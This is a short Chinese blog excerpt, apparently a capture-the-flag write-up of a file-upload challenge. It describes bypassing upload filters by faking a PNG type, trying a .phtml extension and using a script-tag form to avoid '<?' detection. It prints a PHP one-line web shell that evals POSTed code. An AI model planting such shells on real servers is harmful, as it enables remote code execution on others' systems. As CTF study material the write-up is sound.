摘要： 一道文件上传题 先随便传一个php一句话木马 php抓包 改为png图片 还是被发现了..百度得知可以改为phtml后缀文件。 ..还是不行，换一种方式表达绕过<?限制 <script language='php'>eval($_POST['theoyu']);</script> 还是被检测出来了， 阅读全文